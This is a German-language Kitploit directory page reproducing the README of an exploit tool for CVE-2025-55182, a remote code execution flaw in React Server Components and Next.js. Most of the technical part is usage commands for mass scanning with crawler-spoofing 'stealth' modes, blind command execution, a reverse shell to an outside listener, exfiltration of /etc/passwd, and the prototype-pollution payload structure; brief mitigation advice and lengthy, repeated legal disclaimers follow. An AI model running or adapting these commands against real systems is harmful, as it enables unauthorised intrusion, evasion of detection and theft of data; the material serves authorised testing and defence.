Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-55182-exp — CVE-2025-55182 React Server Components – Remote Code Execution Exploit-Tool | Kitploit
Tools/GitHubGitHub/spritualkb/cve-2025-55182-exp
SchwachstellenscannerExploitationWebanwendungs-ExploitationCTFPenetrationstestsLernen & BildungRed TeamingRemote-Access-ToolPayload-Entwicklung
GitHubspritualkb/cve-2025-55182-exp

CVE-2025-55182-exp

CVE-2025-55182 React Server Components – Remote Code Execution Exploit-Tool

46123vor 9 MonatenVon Kitploit geprüft
Repository anzeigen

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-55182-exp

CVE Typ Python Lizenz

🔥 Übersicht

CVE-2025-55182 ist eine kritische Sicherheitslücke zur Remote-Codeausführung (RCE) in React Server Components (RSC), die Next.js-Anwendungen mit App Router und Server Actions betrifft.

Die Schwachstelle existiert im Deserialisierungsprozess des Flight-Protokolls und ermöglicht es Angreifern, durch Prototypen-Verschmutzung beliebigen Code auszuführen.

⚠️ Haftungsausschluss

NUR FÜR AUTORISIERTE SICHERHEITSTESTS

Dieses Tool dient ausschließlich zu Bildungs- und autorisierten Penetrationstestzwecken. Unautorisierter Zugriff auf Computersysteme ist illegal. Jegliche illegale oder nicht autorisierte Nutzung dieses Tools liegt in der alleinigen Verantwortung des Benutzers. Der Autor übernimmt keinerlei Haftung.

Bitte lesen Sie die vollständige DISCLAIMER.md, bevor Sie dieses Tool verwenden.

Durch die Nutzung dieses Tools erklären Sie sich damit einverstanden, dass:

  • Sie eine ordnungsgemäße Autorisierung für alle Tests eingeholt haben
  • Sie alle geltenden Gesetze und Vorschriften einhalten
  • Sie die volle Verantwortung für Ihre Handlungen übernehmen
  • Der Autor für jeglichen Missbrauch nicht haftbar ist

📋 Betroffene Versionen

KomponenteBetroffene Versionen
react-server-dom-webpack19.0.0 - 19.2.0
Next.js15.x, 16.x (App Router + Server Actions)

🛠️ Installation

root@kitploit:~
# Repository klonen
git clone https://github.com/Spritualkb/CVE-2025-55182-exp.git
cd CVE-2025-55182-exp

# Abhängigkeiten installieren
pip install requests
pip install requests[socks]  # Für SOCKS5-Proxy-Unterstützung

📖 Verwendung

Einzelnes Ziel prüfen

root@kitploit:~
python3 exploit.py http://target:3000 --check

Stapel-Scan aus Datei

root@kitploit:~
# Einfacher Batch-Scan
python3 exploit.py -f targets.txt --check

# Mit Stealth-Modus und Verzögerung
python3 exploit.py -f targets.txt --check --stealth crawler --delay 2

# Anfällige Ziele in Datei speichern
python3 exploit.py -f targets.txt --check -o vulnerable.txt

Befehl ausführen (Blind RCE)

root@kitploit:~
python3 exploit.py http://target:3000 -c "id"

Reverse Shell

root@kitploit:~
# Zuerst Listener starten
nc -lvnp 4444

# Reverse Shell ausführen
python3 exploit.py http://target:3000 --revshell 10.0.0.1 4444

Befehlsausgabe exfiltrieren

root@kitploit:~
# Listener starten
nc -lvnp 4444

# Befehl ausführen und Ausgabe exfiltrieren
python3 exploit.py http://target:3000 --exfil "cat /etc/passwd" 10.0.0.1 4444

Mit Proxy

root@kitploit:~
python3 exploit.py http://target:3000 --check --proxy socks5://127.0.0.1:1080

🎭 Stealth-Modi

ModusBeschreibung
browserImitiert echte Browser-Anfragen (Standard)
crawlerImitiert Suchmaschinen-Crawler (Googlebot, Baiduspider, etc.)
securityVerwendet User-Agents von Sicherheits-Scannern

🔧 Optionen

OptionBeschreibung
targetZiel-URL (z.B. http://localhost:3000)
-f, --fileDatei mit Ziel-URLs (eine pro Zeile)
-o, --outputAusgabedatei für anfällige Ziele
-c, --commandAuszuführender Befehl (blind)
--checkPrüft auf Schwachstelle
--proxySOCKS5-Proxy (z.B. socks5://127.0.0.1:1080)
--stealthStealth-Modus: browser, crawler, security
--delayVerzögerung zwischen Anfragen in Sekunden
--variantsMehrere Payload-Varianten für gründliche Prüfung verwenden
--revshell IP PORTReverse Shell an IP:PORT
--exfil CMD IP PORTBefehl ausführen und Ausgabe per POST an IP:PORT senden
-t, --timeoutTimeout für Anfragen in Sekunden (Standard: 15)

🔬 Technische Details

Schwachstellenmechanismus

Der Exploit nutzt Prototypen-Verschmutzung in der Deserialisierung des Flight-Protokolls:

  1. Prototypen-Verschmutzung: Verschmutzt Object.prototype.then über "$1:__proto__:then"
  2. Funktionskonstruktor-Zugriff: Setzt _formData.get auf den Function-Konstruktor über "$1:constructor:constructor"
  3. Code-Injektion: Injiziert bösartigen Code über _prefix, der an Function() übergeben wird

Payload-Struktur

root@kitploit:~
{
  "then": "$1:__proto__:then",
  "status": "resolved_model",
  "reason": -1,
  "value": "{\"then\":\"$B1337\"}",
  "_response": {
    "_prefix": "<malicious_code>",
    "_chunks": "$Q2",
    "_formData": {"get": "$1:constructor:constructor"}
  }
}

📁 Dateistruktur

root@kitploit:~
CVE-2025-55182-exp/
├── exploit.py      # Haupt-Exploit-Skript
├── targets.txt     # Liste der Ziel-URLs (eine pro Zeile)
└── README.md       # Diese Datei

📝 Format von targets.txt

root@kitploit:~
# Kommentare beginnen mit #
http://target1.com:3000
https://target2.com
target3.com:3000

🛡️ Mitigation

  1. Aktualisieren Sie auf die neuesten gepatchten Versionen von react-server-dom-webpack und Next.js
  2. Implementieren Sie Eingabevalidierung bei Server Actions
  3. Verwenden Sie eine Web Application Firewall (WAF) mit Regeln zur Erkennung bösartiger Flight-Protokoll-Payloads
  4. Überwachen Sie auf ungewöhnliche serverseitige Fehler (HTTP 500) mit prototypbezogenen Meldungen

📜 Lizenz

Dieses Projekt ist unter der MIT-Lizenz lizenziert – siehe LICENSE-Datei für Details.


⚠️ Rechtlicher Haftungsausschluss

Englisch

Nutzungsbedingungen

Durch Herunterladen, Kopieren, Installieren oder Verwenden dieser Software erklären Sie sich mit den Bedingungen dieses Haftungsausschlusses einverstanden.

Beabsichtigter Zweck

Dieses Tool ist ausschließlich für folgende Zwecke bestimmt:

  • Autorisierte Penetrationstests
  • Sicherheitsforschung und -bildung
  • Schwachstellenbewertung mit entsprechender Autorisierung
  • CTF-Wettbewerbe (Capture The Flag)
  • Persönliche Laborumgebungen

Verbotene Nutzung

Sie dürfen dieses Tool NICHT für Folgendes verwenden:

  • Unautorisierten Zugriff auf Computersysteme
  • Illegale Aktivitäten
  • Angriffe auf Systeme ohne ausdrückliche schriftliche Genehmigung
  • Beschädigung von Systemen oder Daten
  • Aktivitäten, die gegen lokale, staatliche, nationale oder internationale Gesetze verstoßen

Keine Gewährleistung

DIESE SOFTWARE WIRD "WIE BESEHEN" OHNE JEGLICHE AUSDRÜCKLICHE ODER STILLSCHWEIGENDE GEWÄHRLEISTUNG BEREITGESTELLT. DER AUTOR LEHNT ALLE GEWÄHRLEISTUNGEN AB, EINSCHLIESSLICH, ABER NICHT BESCHRÄNKT AUF:

  • Marktgängigkeit
  • Eignung für einen bestimmten Zweck
  • Nichtverletzung von Rechten Dritter

Haftungsbeschränkung

IN KEINEM FALL HAFTET DER AUTOR FÜR IRGENDWELCHE:

  • Direkten, indirekten, beiläufigen, besonderen, exemplarischen oder Folgeschäden
  • Datenverlust, Gewinneinbußen oder entgangene Geschäftsmöglichkeiten
  • Rechtliche Konsequenzen aus Missbrauch dieses Tools

Verantwortung des Benutzers

Der Benutzer übernimmt die volle Verantwortung für:

  • Einholung der ordnungsgemäßen Autorisierung vor dem Testen eines Systems
  • Einhaltung aller geltenden Gesetze und Vorschriften
  • Alle Konsequenzen, die sich aus der Nutzung dieses Tools ergeben
  • Sicherstellung der Rechtmäßigkeit seiner Handlungen in seiner Rechtsordnung

Bestätigung

Durch die Nutzung dieses Tools bestätigen Sie, dass:

  1. Sie diesen Haftungsausschluss gelesen und verstanden haben
  2. Sie dieses Tool nur für legale und autorisierte Zwecke verwenden werden
  3. Sie alle mit der Nutzung dieses Tools verbundenen Risiken akzeptieren
  4. Der Autor keinerlei Verantwortung für Missbrauch übernimmt

Chinesisch

Nutzungsbedingungen

Durch Herunterladen, Kopieren, Installieren oder Verwenden dieser Software erklären Sie sich mit den Bedingungen dieses Haftungsausschlusses einverstanden.

Beabsichtigter Zweck

Dieses Tool ist ausschließlich für folgende Zwecke bestimmt:

  • Autorisierte Penetrationstests
  • Sicherheitsforschung und -bildung
  • Schwachstellenbewertung mit entsprechender Autorisierung
  • CTF-Wettbewerbe (Capture The Flag)
  • Persönliche Laborumgebungen

Verbotene Nutzung

Sie dürfen dieses Tool NICHT für Folgendes verwenden:

  • Unautorisierten Zugriff auf Computersysteme
  • Illegale Aktivitäten
  • Angriffe auf Systeme ohne ausdrückliche schriftliche Genehmigung
  • Beschädigung von Systemen oder Daten
  • Aktivitäten, die gegen lokale, staatliche, nationale oder internationale Gesetze verstoßen

Keine Gewährleistung

DIESE SOFTWARE WIRD "WIE BESEHEN" OHNE JEGLICHE AUSDRÜCKLICHE ODER STILLSCHWEIGENDE GEWÄHRLEISTUNG BEREITGESTELLT. DER AUTOR LEHNT ALLE GEWÄHRLEISTUNGEN AB, EINSCHLIESSLICH, ABER NICHT BESCHRÄNKT AUF:

  • Marktgängigkeit
  • Eignung für einen bestimmten Zweck
  • Nichtverletzung von Rechten Dritter

Haftungsbeschränkung

IN KEINEM FALL HAFTET DER AUTOR FÜR IRGENDWELCHE:

  • Direkten, indirekten, beiläufigen, besonderen, exemplarischen oder Folgeschäden
  • Datenverlust, Gewinneinbußen oder entgangene Geschäftsmöglichkeiten
  • Rechtliche Konsequenzen aus Missbrauch dieses Tools

Verantwortung des Benutzers

Der Benutzer übernimmt die volle Verantwortung für:

  • Einholung der ordnungsgemäßen Autorisierung vor dem Testen eines Systems
  • Einhaltung aller geltenden Gesetze und Vorschriften
  • Alle Konsequenzen, die sich aus der Nutzung dieses Tools ergeben
  • Sicherstellung der Rechtmäßigkeit seiner Handlungen in seiner Rechtsordnung

Bestätigung

Durch die Nutzung dieses Tools bestätigen Sie, dass:

  1. Sie diesen Haftungsausschluss gelesen und verstanden haben
  2. Sie dieses Tool nur für legale und autorisierte Zwecke verwenden werden
  3. Sie alle mit der Nutzung dieses Tools verbundenen Risiken akzeptieren
  4. Der Autor keinerlei Verantwortung für Missbrauch übernimmt

Rechtsreferenzen

Relevante Gesetze

  • China: 《Gesetz der Volksrepublik China zur Cybersicherheit》, §285, §286 des Strafgesetzbuchs der Volksrepublik China
  • USA: Computer Fraud and Abuse Act (CFAA), 18 U.S.C. § 1030
  • EU: Richtlinie 2013/40/EU über Angriffe auf Informationssysteme
  • UK: Computer Misuse Act 1990

Autorisierungsanforderungen

Vor der Durchführung von Sicherheitstests müssen Sie:

  1. Die schriftliche Autorisierung des Systemeigentümers einholen
  2. Den Umfang und die Grenzen der Tests klar definieren
  3. Alle geltenden Gesetze und Vorschriften einhalten
  4. Alle Testaktivitäten dokumentieren

⚠️ Unautorisierter Computerzugriff ist eine Straftat ⚠️
⚠️ Unauthorisierter Computerzugriff ist eine Straftat ⚠️

Tool herunterladen